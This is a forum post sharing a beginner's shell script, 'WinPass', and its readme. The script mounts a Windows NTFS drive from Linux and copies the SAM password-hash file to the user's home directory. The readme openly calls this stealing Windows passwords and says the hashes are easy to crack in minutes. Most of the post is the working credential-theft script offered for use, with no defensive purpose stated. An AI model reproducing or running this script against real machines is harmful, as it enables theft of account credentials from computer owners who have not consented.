I just made a program to grab the SAM (passwords) file from a windows box via linux. My first shell script!
Note that this is by no means the easiest way to do this, nor is it anything new, but it's still nice info to have.
Screenshot:
Here's the code:
- Code: Select all
echo Welcome to WinPass!
echo You have WinPass version 1.0.0 beta.
echo WinPass assumes that the following conditions are true:
echo *The hard drive you want to grab data from is NTFS
echo *The SAM file is WINDOWS/system32/config/SAM
echo *You ran this program with sudo or as root
echo What hard disk do you wish to grab password data from?
read harddisk
echo WinPass wil read from /dev/$harddisk
mkdir /winpass
mount /dev/$harddisk /winpass -t ntfs -o nls=utf8,umask=0222
echo /dev/$harddisk mounted.
cd /winpass/WINDOWS/system32/config/
cp SAM ~
echo Password files copied to ~
echo Cleaning up...
cd /
umount /winpass
rmdir /winpass
echo Done!
And the readme:
- Code: Select all
WinPass 1.0.0 beta
by 3vilp4wn
WinPass grabs windows passwords from linux.
WinPass must be ran with sudo or as root.
WinPass has been tested with Debian 6.0.6 stealing passwords from Windows XP, but should work for almost any linux distro, stealing from almost any windows version.
Once you grab the hashes, you will still need to decrypt them. Due to the F***ING STUPID way windows hashes passwords, this is very easy, and will likely take only a few minutes.
Have Fun,
3vilp4wn.
NOTE:
I am not responsible for *any* damage done to you or any computer as a result using this program.
Always audit the source code of the program before running it, and make sure it does not execute any commands you don't want it to.
Have fun,
3vilp4wn.
